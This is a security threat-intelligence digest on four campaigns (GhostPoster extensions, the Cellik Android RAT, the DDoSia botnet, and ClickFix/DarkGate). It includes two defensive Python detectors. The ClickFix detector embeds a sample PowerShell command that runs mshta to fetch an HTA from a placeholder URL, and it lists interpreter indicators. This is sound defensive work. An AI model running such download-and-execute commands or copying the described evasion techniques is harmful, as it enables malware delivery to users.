GhostPoster: Steganography-Enabled Malicious Firefox Extension
Intelligence from Koi Security shows that the GhostPoster campaign is abusing Firefox extensions to gain high-privilege, persistent access to users’ browsers while remaining difficult to detect. The operation centers on extensions such as “Free VPN Forever” that appear benign but conceal a steganographic JavaScript loader within their own PNG logo, which is activated by scanning for a “===” marker in the image bytes. Once executed, this loader periodically contacts attacker-controlled infrastructure, retrieves an encoded payload, and uses a custom scheme—case swapping, digit swapping, Base64, and XOR with the extension ID—to store decrypted code in browser storage without leaving obvious static artifacts. The final payload focuses on monetization and surveillance: hijacking affiliate links on major e-commerce platforms, injecting Google Analytics tracking into every page, and building detailed profiles of infected browsers. In parallel, the extensions strip security headers, inject hidden iframes, and implement multiple CAPTCHA-bypass techniques to keep their ad and click-fraud pipeline running while degrading baseline web security. From an operational standpoint, GhostPoster emphasizes layered evasion rather than novel exploitation, combining steganography, staged loading, randomized C2 check-ins, delayed activation, and encrypted on-disk artifacts to frustrate both automated review and traditional network monitoring. Some of the 17 related extensions use PNG-embedded payloads, while others fetch or eval obfuscated JavaScript from the same backend domains, suggesting an experimentation phase to identify which delivery methods best evade detection while maximizing installs and revenue. The campaign fits a broader pattern in which “free VPN” and utility extensions are repurposed as surveillance and monetization platforms, exploiting user trust in security- and privacy-branded software. 
For defenders, GhostPoster underscores the need to treat browser extensions as high-risk code, to prioritize behavioral monitoring over static analysis, and to hunt for indicators such as anomalous image parsing, header stripping across all sites, hidden iframe lifecycles, and low-frequency, probabilistic C2 traffic originating from extension processes.
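One concrete hunt for the "anomalous image parsing" indicator above is to check every PNG shipped in an extension package for bytes appended after the IEND chunk or for the "===" marker the loader scans for. The following is an added example for this digest, not code from Koi Security's report; the treatment of any post-IEND trailer as suspicious is an assumption, and the sample PNG with a harmless placeholder after the marker is constructed here.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _chunk(ctype: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk: length, type, payload, CRC32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def png_end_offset(data: bytes) -> tuple[int, list[str]]:
    """Walk the chunk list; return the offset just past IEND and chunk types with bad CRCs."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, bad = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError("chunk length runs past end of file")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            bad.append(ctype.decode("latin-1"))
        pos += 12 + length
        if ctype == b"IEND":
            return pos, bad
    raise ValueError("truncated PNG: no IEND chunk")

def scan_png(data: bytes, marker: bytes = b"===") -> dict:
    """Flag bytes after IEND (where a decoder ignores them) or the loader marker anywhere."""
    end, bad = png_end_offset(data)
    trailer = data[end:]
    return {
        "trailing_bytes": len(trailer),
        "marker_offset": data.find(marker),  # -1 if absent
        "marker_in_trailer": marker in trailer,
        "bad_crc_chunks": bad,
        "suspicious": bool(trailer) or marker in data,
    }

def make_minimal_png() -> bytes:
    """Constructed 1x1 8-bit grayscale PNG standing in for an extension logo."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

CLEAN_PNG = make_minimal_png()
# Constructed sample: marker plus a harmless placeholder appended after IEND.
STEGO_PNG = CLEAN_PNG + b"===" + b"/* placeholder, not a real loader */"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_PNG), ("stego", STEGO_PNG)):
        print(name, scan_png(blob))
```

Run it over every image under an unpacked extension directory; a legitimate logo has zero trailing bytes, and a marker hit inside the trailer is a far stronger signal than a chance "===" inside compressed chunk data.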
Cellik: Play Store–Integrated Android RAT as an Operational Enabler
Cellik is a newly observed Android remote access trojan (RAT) that prioritizes operational breadth and ease of deployment over novel exploitation techniques, offering full device control, real-time surveillance, and tightly integrated Play Store–based distribution. It provides operators with live screen streaming and remote UI control, effectively turning the victim’s phone into an invisible VNC session, while also enabling continuous keylogging and full notification interception to harvest messages and one-time passcodes. The RAT extends this visibility with comprehensive file system access, including browsing, exfiltration, modification, and deletion of local and cloud-linked files, with encrypted transfers to reduce detection by network and on-device security layers. Beyond passive surveillance, Cellik enables active abuse via a hidden browser that can drive invisible web sessions, replay saved cookies, and intercept submitted credentials, allowing attackers to perform stealthy phishing and account takeover directly from the victim device. An integrated injection framework supports malicious overlays and in-app code injection, enabling targeted credential theft and data interception across multiple apps in parallel. In effect, Cellik consolidates common Android espionage and fraud capabilities into a single pane of glass, enabling continuous, interactive control of compromised devices. Cellik’s most concerning advancement is its integration with the Google Play ecosystem and an embedded one-click APK builder that lets operators wrap its payload inside legitimate Play Store apps. Through its control panel, an attacker can browse trusted applications, bundle the RAT into popular packages, and generate repackaged APKs aimed at stealthy, large-scale distribution that may evade reputation-based defenses. 
This model mirrors and extends trends seen in other Android malware-as-a-service offerings such as HyperRAT, PhantomOS, and Nebula, where subscription-based kits provide turnkey APK generation, cloud C2, and user-friendly dashboards to low-skilled actors. For defenders, Cellik underscores the need for stronger mobile telemetry, behavioral detection focused on remote control and hidden browsing activity, scrutiny of repackaged apps that masquerade as popular titles, and continuous monitoring of underground markets where such kits are marketed and iterated.
NoName057(16)’s Volunteer Botnet Targeting European Government and Infrastructure
Intelligence from Picus Security shows that NoName057(16) is systematically targeting NATO members and European states that oppose Russia’s invasion of Ukraine, with a strong emphasis on government and critical service providers. The group, assessed as a Kremlin-backed hacktivist project originally incubated within CISM, coordinates largely via Telegram and uses its proprietary DDoSia platform to transform volunteers into a managed, reward-based botnet. DDoSia employs a two-stage kill chain: clients first authenticate by sending AES-GCM–encrypted system fingerprints, then retrieve encrypted target lists that define victim hosts, ports, protocols (such as HTTP/2), and randomized parameters to evade simple filters. The underlying infrastructure is multi-tiered, with short-lived public-facing C2 nodes fronting more restricted backend servers, enabling rapid rotation of exposed assets while preserving the core command environment. From a tradecraft standpoint, DDoSia supports a blend of volumetric and application-layer techniques—including SYN and ACK floods, HTTP GET floods, and Slowloris-style “nginx_loris” attacks—primarily over ports 80 and 443 to blend with legitimate web traffic. This model lowers the barrier to participation by providing an easy-to-use Go-based client and cryptocurrency incentives, while central operators retain control over targeting and attack profiles. NoName057(16) has further expanded its impact through collaborations with other pro-Russia hacktivist entities, such as the Cyber Army of Russia Reborn, contributing to the creation of the hybrid Z-Pentest group and claiming operations targeting operational technology assets. Despite coordinated law-enforcement activity in July 2025 under Operation Eastwood—including arrests, warrants, and searches across several European countries—the actor remains active and continues to frame its campaigns as patriotic cyber-partisan operations in support of Russian strategic objectives.
For defenders, this activity underscores the need for layered DDoS protections, monitoring of characteristic traffic patterns and timing, and tabletop exercises focused on state-aligned hacktivist campaigns leveraging crowdsourced tooling.
ClickFix Campaigns Exploit “Fix-It” Prompts to Deploy DarkGate
ClickFix is a socially engineered initial access technique that relies on user-driven execution of attacker-supplied commands rather than autonomous exploitation, blending deceptive troubleshooting prompts with layered obfuscation to deliver DarkGate malware. The flow typically begins with a fake browser or extension error—such as a “Word Online extension not installed” warning—paired with a “How to fix” button that conceals multiple layers of Base64-encoded content within the HTML. When decoded, these strings reveal a PowerShell command that silently downloads a malicious HTA file from a remote server, saves it to a public directory, and executes it, while clearing the clipboard and exiting to reduce forensic artifacts. Subsequent stages deploy an AutoIt executable and embedded script, which create additional directories, drop more components, and execute them without further user interaction, using DES-encrypted logic to unpack and launch DarkGate. Once active, DarkGate establishes C2 communications and enables full remote access, matching MITRE ATT&CK patterns for command-and-scripting-interpreter abuse, obfuscation, masquerading, and web-based C2. ClickFix underscores how adversaries weaponize user trust in “helpful” fixes by offloading critical execution steps—copying from the clipboard, running “Win + R”, and pasting commands—onto victims, thereby sidestepping some traditional detection controls. The technique’s reliance on HTML-embedded, reversibly encoded PowerShell, masqueraded HTA payloads, and staged AutoIt loaders makes it difficult to spot without behavioral monitoring focused on script interpreters, clipboard manipulation, and unexpected process chains. 
Recommended mitigations include user education against running copied commands, restricting access to Win + R and unapproved interpreters in enterprise environments, enforcing application control for HTA/PowerShell execution, and deploying security tools that detect anomalous script behavior rather than just signatures.
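The “reversibly encoded PowerShell” hidden inside the lure page is something a mail or web-proxy scanner can peel back before a user ever sees the fix button. The following is an added example for this digest, not code from the underlying report: it recursively decodes every plausible Base64 run in an HTML body and flags script-interpreter indicators in the result. The indicator list and the depth limit are assumptions, and the nested sample page is constructed here around a placeholder command, not a real ClickFix payload.

```python
import base64
import re

# Assumed indicator set: interpreters and artefacts the ClickFix chain relies on.
INTERPRETER_HINTS = ("powershell", "mshta", ".hta", "-enc", "iex", "invoke-expression")
B64_RE = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")

def _try_b64(token: bytes):
    """Decode strictly; return None for anything that is not valid Base64."""
    try:
        out = base64.b64decode(token, validate=True)
    except Exception:
        return None
    return out or None

def peel_base64(blob: bytes, max_depth: int = 6) -> list[bytes]:
    """Decode every plausible Base64 run, then repeat on the output, up to max_depth layers."""
    layers, frontier = [], [blob]
    for _ in range(max_depth):
        nxt = []
        for chunk in frontier:
            for m in B64_RE.finditer(chunk):
                dec = _try_b64(m.group(0))
                if dec is None or dec == chunk:
                    continue
                layers.append(dec)
                nxt.append(dec)
        if not nxt:
            break
        frontier = nxt
    return layers

def assess_html(html: bytes) -> dict:
    """Report how many encoded layers were peeled and which indicators appeared in them."""
    layers, hits = peel_base64(html), []
    for layer in layers:
        # -EncodedCommand payloads are UTF-16LE; a null in the first bytes is the tell.
        text = layer.decode("utf-16-le", "ignore") if b"\x00" in layer[:4] else layer.decode("latin-1")
        hits += [h for h in INTERPRETER_HINTS if h in text.lower()]
    return {"layers": len(layers), "indicators": sorted(set(hits)), "suspicious": bool(hits)}

def _nest(data: bytes, depth: int) -> bytes:
    for _ in range(depth):
        data = base64.b64encode(data)
    return data

# Constructed lure: two Base64 layers wrapped around a placeholder (non-functional) command.
PLACEHOLDER_CMD = b'powershell -NoProfile -Command "mshta CONSTRUCTED_PLACEHOLDER_URL/fix.hta"'
SAMPLE_HTML = b'<button data-cmd="' + _nest(PLACEHOLDER_CMD, 2) + b'">How to fix</button>'

if __name__ == "__main__":
    print(assess_html(SAMPLE_HTML))
```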